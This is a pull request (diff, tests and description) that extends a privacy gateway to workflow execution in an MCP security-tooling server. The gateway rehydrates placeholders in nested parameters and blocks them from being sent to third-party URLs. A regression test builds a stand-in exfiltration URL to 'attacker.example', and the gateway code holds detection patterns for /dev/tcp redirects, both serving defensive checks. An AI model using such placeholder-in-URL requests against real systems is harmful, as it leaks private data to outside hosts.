### PR TITLE
fix(mcp): enforce privacy gateway for workflow execution

### DIFF
--- a/mcp/src/privacy/gateway.py
+++ b/mcp/src/privacy/gateway.py
@@ -22,7 +22,7 @@ import re
 import shlex
 from dataclasses import dataclass, field
 from enum import Enum
-from typing import Dict, List, Optional, Sequence, Tuple
+from typing import Any, Dict, List, Optional, Sequence, Tuple
 from urllib.parse import urlsplit
 
 from .vault import PrivacyVault, PLACEHOLDER_RE
@@ -219,29 +219,96 @@ class CommandGateway:
         resolved: Dict[str, object] = {}
         seen: List[str] = []
         allow = set(rehydrate_fields)
-        for key, value in args.items():
+
+        def collect_placeholders(value: object) -> List[str]:
             if isinstance(value, str):
-                phs = PLACEHOLDER_RE.findall(value)
-                if phs and key not in allow:
-                    return self._block(
-                        f"placeholder in non-approved field '{key}' (only {sorted(allow)} may be rehydrated)",
-                        phs,
-                    )
-                if phs:
-                    seen.extend(phs)
-                    res = self._rehydrate(value, phs, vault)
-                    if res.blocked:
-                        return res
-                    resolved[key] = res.command
-                else:
-                    resolved[key] = value
-            else:
+                return PLACEHOLDER_RE.findall(value)
+            if isinstance(value, dict):
+                found: List[str] = []
+                for nested_key, nested_value in value.items():
+                    found.extend(collect_placeholders(nested_key))
+                    found.extend(collect_placeholders(nested_value))
+                return found
+            if isinstance(value, (list, tuple)):
+                found = []
+                for item in value:
+                    found.extend(collect_placeholders(item))
+                return found
+            return []
+
+        def resolve_value(value: object) -> Tuple[object, Optional[GatewayResult]]:
+            if isinstance(value, str):
+                phs = list(dict.fromkeys(PLACEHOLDER_RE.findall(value)))
+                if not phs:
+                    return value, None
+                seen.extend(phs)
+                result = self._rehydrate(value, phs, vault)
+                if result.blocked:
+                    return value, result
+                return result.command or value, None
+            if isinstance(value, list):
+                output = []
+                for item in value:
+                    resolved_item, error = resolve_value(item)
+                    if error is not None:
+                        return value, error
+                    output.append(resolved_item)
+                return output, None
+            if isinstance(value, tuple):
+                output = []
+                for item in value:
+                    resolved_item, error = resolve_value(item)
+                    if error is not None:
+                        return value, error
+                    output.append(resolved_item)
+                return tuple(output), None
+            if isinstance(value, dict):
+                output = {}
+                for nested_key, nested_value in value.items():
+                    resolved_key, error = resolve_value(nested_key)
+                    if error is not None:
+                        return value, error
+                    resolved_value, error = resolve_value(nested_value)
+                    if error is not None:
+                        return value, error
+                    output[resolved_key] = resolved_value
+                return output, None
+            return value, None
+
+        for key, value in args.items():
+            phs = collect_placeholders(value)
+            if phs and key not in allow:
+                return self._block(
+                    f"placeholder in non-approved field '{key}' (only {sorted(allow)} may be rehydrated)",
+                    phs,
+                )
+            if not phs:
                 resolved[key] = value
+                continue
+            resolved_value, error = resolve_value(value)
+            if error is not None:
+                return error
+            resolved[key] = resolved_value
         return GatewayResult(
             GatewayDecision.ALLOW,
             resolved=resolved,
             placeholders=list(dict.fromkeys(seen)),
         )
+
+    def sanitize_result(self, value: Any, vault: PrivacyVault) -> Any:
+        """Sanitize each string in a structured workflow result."""
+        if isinstance(value, str):
+            return self.sanitize_output(value, vault)
+        if isinstance(value, list):
+            return [self.sanitize_result(item, vault) for item in value]
+        if isinstance(value, tuple):
+            return tuple(self.sanitize_result(item, vault) for item in value)
+        if isinstance(value, dict):
+            return {
+                self.sanitize_result(key, vault): self.sanitize_result(item, vault)
+                for key, item in value.items()
+            }
+        return value
 
     # ------------------------------------------------------------------ output
     def sanitize_output(self, text: str, vault: PrivacyVault) -> str:

--- a/mcp/src/privacy/gateway.py
+++ b/mcp/src/privacy/gateway.py
@@ -40,6 +40,7 @@ _OUTBOUND_DATA_FLAGS = {
 # Characters that must never appear in a rehydrated value (injection guard).
 _SHELL_META_RE = re.compile(r"""[;|&`$><(){}\[\]\n\r'"\\!*?~]""")
 _NET_REDIRECT_RE = re.compile(r"/dev/(?:tcp|udp)/|>\(|<\(")
+_HTTP_URL_RE = re.compile(r"https?://[^\s\"'<>`|\\]+", re.IGNORECASE)
 
 
 class GatewayDecision(str, Enum):
@@ -72,6 +73,21 @@ class CommandGateway:
 
     def _block(self, reason: str, placeholders: Sequence[str]) -> GatewayResult:
         return GatewayResult(GatewayDecision.BLOCK, reason=reason, placeholders=list(placeholders))
+
+    def _url_context_block_reason(self, value: str) -> Optional[str]:
+        """Return a reason when a URL sends a placeholder to a third party."""
+        for match in _HTTP_URL_RE.finditer(value):
+            url = match.group(0)
+            if not PLACEHOLDER_RE.search(url):
+                continue
+            parts = urlsplit(url)
+            host = (parts.hostname or "").upper()
+            host_is_placeholder = bool(PLACEHOLDER_RE.fullmatch(host))
+            if PLACEHOLDER_RE.search(parts.query) or PLACEHOLDER_RE.search(parts.fragment):
+                return "placeholder embedded in a URL query/fragment (exfiltration vector)"
+            if not host_is_placeholder:
+                return "placeholder sent to a literal (non-target) URL host (exfiltration)"
+        return None
 
     # ------------------------------------------------------------------ raw shell
     def process_command(self, command: str, vault: PrivacyVault, _depth: int = 0) -> GatewayResult:
@@ -139,25 +155,9 @@ class CommandGateway:
 
         # 4) Per-token URL analysis (the classic exfil vector).
         for tok in argv:
-            tok_ph = PLACEHOLDER_RE.findall(tok)
-            if not tok_ph:
-                continue
-            if re.match(r"https?://", tok, re.IGNORECASE):
-                parts = urlsplit(tok)
-                # urlsplit lowercases .hostname; restore case to match a placeholder.
-                host = (parts.hostname or "").upper()
-                host_is_ph = bool(PLACEHOLDER_RE.fullmatch(host))
-                # A protected value in the query/fragment is exfiltration.
-                if PLACEHOLDER_RE.search(parts.query) or PLACEHOLDER_RE.search(parts.fragment):
-                    return self._block(
-                        "placeholder embedded in a URL query/fragment (exfiltration vector)", placeholders
-                    )
-                # If the destination host is a literal (not the target itself),
-                # any placeholder in the URL is being sent to a third party.
-                if not host_is_ph:
-                    return self._block(
-                        "placeholder sent to a literal (non-target) URL host (exfiltration)", placeholders
-                    )
+            reason = self._url_context_block_reason(tok)
+            if reason is not None:
+                return self._block(reason, placeholders)
 
         # 5) Outbound request bodies (curl/wget POST/upload) with a placeholder.
         for i, tok in enumerate(argv):
@@ -242,6 +242,9 @@ class CommandGateway:
                 if not phs:
                     return value, None
                 seen.extend(phs)
+                reason = self._url_context_block_reason(value)
+                if reason is not None:
+                    return value, self._block(reason, phs)
                 result = self._rehydrate(value, phs, vault)
                 if result.blocked:
                     return value, result

--- a/mcp/src/server.py
+++ b/mcp/src/server.py
@@ -358,7 +358,8 @@ def list_workflows() -> Dict[str, Any]:
 def run_workflow(
     workflow: str,
     method: str,
-    params: Optional[Dict[str, Any]] = None
+    params: Optional[Dict[str, Any]] = None,
+    session_id: Optional[str] = None,
 ) -> Dict[str, Any]:
     """
     Execute a workflow method dynamically by name.
@@ -369,6 +370,7 @@ def run_workflow(
         workflow: Name of the workflow (e.g., "port_scan", "subdomain_discovery")
         method: Name of the method to call (e.g., "scan_ports", "discover_subdomains")
         params: Dictionary of parameters to pass to the method
+        session_id: Privacy vault session ID. Uses the server session by default.
 
     Returns:
         Result of the workflow execution, or error details if failed.
@@ -392,7 +394,19 @@ def run_workflow(
         # Web crawling
         run_workflow("web_crawler", "crawl_website", {"target": "https://example.com"})
     """
-    return workflow_registry.run_workflow(workflow, method, params)
+    privacy_gateway = None
+    privacy_vault = None
+    if PRIVACY_ENABLED:
+        privacy_gateway = _command_gateway
+        privacy_vault = _get_vault(session_id)
+
+    return workflow_registry.run_workflow(
+        workflow,
+        method,
+        params,
+        privacy_gateway=privacy_gateway,
+        privacy_vault=privacy_vault,
+    )
 
 # ============================================================================
 # DASHBOARD EXPORT TOOLS (4 tools)

--- a/mcp/src/tools/workflows/list_workflows.py
+++ b/mcp/src/tools/workflows/list_workflows.py
@@ -13,6 +13,7 @@ from pathlib import Path
 from typing import Dict, Any, List, Optional, Union, get_type_hints
 
 from src.docker_client import DarkmoonDockerClient
+from src.privacy import CommandGateway, PrivacyVault
 from src.tools.workflows.base import BaseWorkflow
 
 
@@ -297,7 +298,10 @@ class WorkflowRegistry:
         self,
         workflow: str,
         method: str,
-        params: Optional[Dict[str, Any]] = None
+        params: Optional[Dict[str, Any]] = None,
+        *,
+        privacy_gateway: Optional[CommandGateway] = None,
+        privacy_vault: Optional[PrivacyVault] = None,
     ) -> Dict[str, Any]:
         """
         Execute a workflow method by name.
@@ -306,6 +310,8 @@ class WorkflowRegistry:
             workflow: Name of the workflow (e.g., "port_scan")
             method: Name of the method to call (e.g., "scan_ports")
             params: Parameters to pass to the method
+            privacy_gateway: Gateway for the workflow privacy boundary.
+            privacy_vault: Session vault for local placeholder resolution.
 
         Returns:
             Result of the workflow execution
@@ -313,12 +319,17 @@ class WorkflowRegistry:
         Raises:
             ValueError: If workflow or method not found
         """
+        def finish(result: Dict[str, Any]) -> Dict[str, Any]:
+            if privacy_gateway is None or privacy_vault is None:
+                return result
+            return privacy_gateway.sanitize_result(result, privacy_vault)
+
         if workflow not in self.workflows:
             available = list(self.workflows.keys())
-            return {
+            return finish({
                 "error": f"Workflow '{workflow}' not found",
                 "available_workflows": available,
-            }
+            })
 
         instance = self.workflows[workflow]
 
@@ -326,10 +337,10 @@ class WorkflowRegistry:
             available_methods = list(
                 self.workflow_metadata[workflow]["methods"].keys()
             )
-            return {
+            return finish({
                 "error": f"Method '{method}' not found in workflow '{workflow}'",
                 "available_methods": available_methods,
-            }
+            })
 
         workflow_method = getattr(instance, method)
         method_metadata = self.workflow_metadata[workflow]["methods"].get(method, {})
@@ -338,27 +349,42 @@ class WorkflowRegistry:
             # Convert parameters to expected types
             converted_params = self._convert_params(params or {}, method_metadata)
 
+            if privacy_gateway is not None and privacy_vault is not None:
+                privacy_result = privacy_gateway.process_tool_call(
+                    tool=f"{workflow}.{method}",
+                    args=converted_params,
+                    rehydrate_fields=tuple(converted_params),
+                    vault=privacy_vault,
+                )
+                if privacy_result.blocked:
+                    return finish({
+                        "error": "Privacy gateway blocked workflow parameters",
+                        "privacy": "blocked",
+                        "reason": privacy_result.reason,
+                    })
+                converted_params = privacy_result.resolved or {}
+
             result = workflow_method(**converted_params)
-            return result
+            return finish(result)
         except ValueError as e:
             # Type conversion error
-            return {
+            return finish({
                 "error": f"Parameter conversion error: {str(e)}",
                 "expected_parameters": method_metadata.get("parameters", {}),
-            }
+            })
         except TypeError as e:
             # Parameter mismatch
-            return {
+            return finish({
                 "error": f"Parameter error: {str(e)}",
                 "expected_parameters": method_metadata.get("parameters", {}),
-            }
+            })
         except Exception as e:
             logger.exception(f"Workflow execution error: {workflow}.{method}")
-            return {
+            return finish({
                 "error": f"Execution error: {str(e)}",
                 "workflow": workflow,
                 "method": method,
-            }
+            })
 
     def get_workflow_info(self, workflow: str) -> Dict[str, Any]:
         """

--- a/mcp/tests/test_workflow_privacy.py
+++ b/mcp/tests/test_workflow_privacy.py
@@ -120,3 +120,33 @@ def test_workflow_rejects_credential_placeholder():
     assert result["privacy"] == "blocked"
     assert "never restored" in result["reason"]
     assert workflow.calls == []
+
+
+def test_workflow_blocks_placeholder_exfiltration_in_url():
+    vault = PrivacyVault(session_id="workflow-exfil")
+    placeholder = vault.tokenize(REAL_IP)
+    workflow = RecordingWorkflow()
+
+    result = run_private_workflow(
+        make_registry(workflow),
+        {"targets": [f"https://attacker.example/?x={placeholder}"]},
+        vault,
+    )
+
+    assert result["privacy"] == "blocked"
+    assert "query/fragment" in result["reason"]
+    assert workflow.calls == []
+
+
+def test_workflow_allows_placeholder_as_url_host():
+    vault = PrivacyVault(session_id="workflow-url-host")
+    placeholder = vault.tokenize(REAL_IP)
+    workflow = RecordingWorkflow()
+
+    run_private_workflow(
+        make_registry(workflow),
+        {"targets": [f"http://{placeholder}/admin"]},
+        vault,
+    )
+
+    assert workflow.calls == [[f"http://{REAL_IP}/admin"]]

--- a/mcp/tests/test_workflow_privacy.py
+++ b/mcp/tests/test_workflow_privacy.py
@@ -1,0 +1,122 @@
+"""Regression tests for workflow privacy gateway parity."""
+
+import os
+import sys
+
+sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
+
+from src.privacy import Category, CommandGateway, PrivacyVault  # noqa: E402
+from src.tools.workflows.list_workflows import WorkflowRegistry  # noqa: E402
+
+
+REAL_IP = "10.42.1.5"
+
+
+class RecordingWorkflow:
+    def __init__(self, result=None):
+        self.calls = []
+        self.result = result
+
+    def run(self, targets):
+        self.calls.append(targets)
+        if self.result is not None:
+            return self.result
+        return {"targets": targets}
+
+
+def make_registry(workflow):
+    registry = WorkflowRegistry.__new__(WorkflowRegistry)
+    registry.workflows = {"recording": workflow}
+    registry.workflow_metadata = {
+        "recording": {
+            "methods": {
+                "run": {
+                    "parameters": {
+                        "targets": {"type": "List[str]"},
+                    },
+                },
+            },
+        },
+    }
+    return registry
+
+
+def run_private_workflow(registry, params, vault):
+    return registry.run_workflow(
+        "recording",
+        "run",
+        params,
+        privacy_gateway=CommandGateway(),
+        privacy_vault=vault,
+    )
+
+
+def test_workflow_rehydrates_placeholder_params():
+    vault = PrivacyVault(session_id="workflow-input")
+    placeholder = vault.tokenize(REAL_IP)
+    workflow = RecordingWorkflow()
+
+    result = run_private_workflow(
+        make_registry(workflow),
+        {"targets": [placeholder]},
+        vault,
+    )
+
+    assert workflow.calls == [[REAL_IP]]
+    assert result["targets"] == [placeholder]
+
+
+def test_workflow_sanitizes_nested_result_values_and_keys():
+    vault = PrivacyVault(session_id="workflow-output")
+    placeholder = vault.tokenize(REAL_IP)
+    workflow = RecordingWorkflow(
+        {
+            "target": REAL_IP,
+            "nested": [{"hosts": [REAL_IP]}, {REAL_IP: {"value": REAL_IP}}],
+        }
+    )
+
+    result = run_private_workflow(
+        make_registry(workflow),
+        {"targets": [placeholder]},
+        vault,
+    )
+
+    assert result == {
+        "target": placeholder,
+        "nested": [
+            {"hosts": [placeholder]},
+            {placeholder: {"value": placeholder}},
+        ],
+    }
+
+
+def test_workflow_rejects_unknown_placeholder():
+    vault = PrivacyVault(session_id="workflow-unknown")
+    workflow = RecordingWorkflow()
+
+    result = run_private_workflow(
+        make_registry(workflow),
+        {"targets": ["IP_PRIVATE_999"]},
+        vault,
+    )
+
+    assert result["privacy"] == "blocked"
+    assert "could not resolve placeholder IP_PRIVATE_999" in result["reason"]
+    assert workflow.calls == []
+
+
+def test_workflow_rejects_credential_placeholder():
+    vault = PrivacyVault(session_id="workflow-credential")
+    credential = vault.register("PlainSecret", Category.CRED)
+    workflow = RecordingWorkflow()
+
+    result = run_private_workflow(
+        make_registry(workflow),
+        {"targets": [credential]},
+        vault,
+    )
+
+    assert result["privacy"] == "blocked"
+    assert "never restored" in result["reason"]
+    assert workflow.calls == []


### PR DESCRIPTION
## Summary

`execute_command` and `run_workflow` currently have different privacy semantics.

`execute_command` restores placeholders locally and sanitizes tool output. `run_workflow` delegates directly to `WorkflowRegistry`.

This change applies the existing privacy gateway to the workflow boundary.

## Changes

- Restore approved placeholders in structured workflow parameters.
- Support nested dictionaries, lists, tuples, and dictionary keys.
- Apply shared URL destination checks before structured value restoration.
- Reject third-party URL query and path exfiltration contexts.
- Reject unknown placeholders before workflow execution.
- Keep the existing `CRED` restoration restriction.
- Sanitize all strings in nested workflow results.
- Use the matching session vault from the MCP server.
- Preserve existing behavior when privacy protection is disabled.

## Tests

Added six workflow regression tests:

- Placeholder parameters reach the workflow as local values.
- Nested result values and keys return as placeholders.
- Unknown placeholders stop workflow execution.
- Credential placeholders stop workflow execution.
- Third-party URL exfiltration stops workflow execution.
- A placeholder URL host restores for local workflow execution.

Validation:

```text
28 passed
ruff check --select E9,F63,F7,F82: passed
git diff --check: passed
```

## Scope

This PR does not change `execution_guard`, workflow command validation, or tool allowlists.

A separate change can centralize execution policy.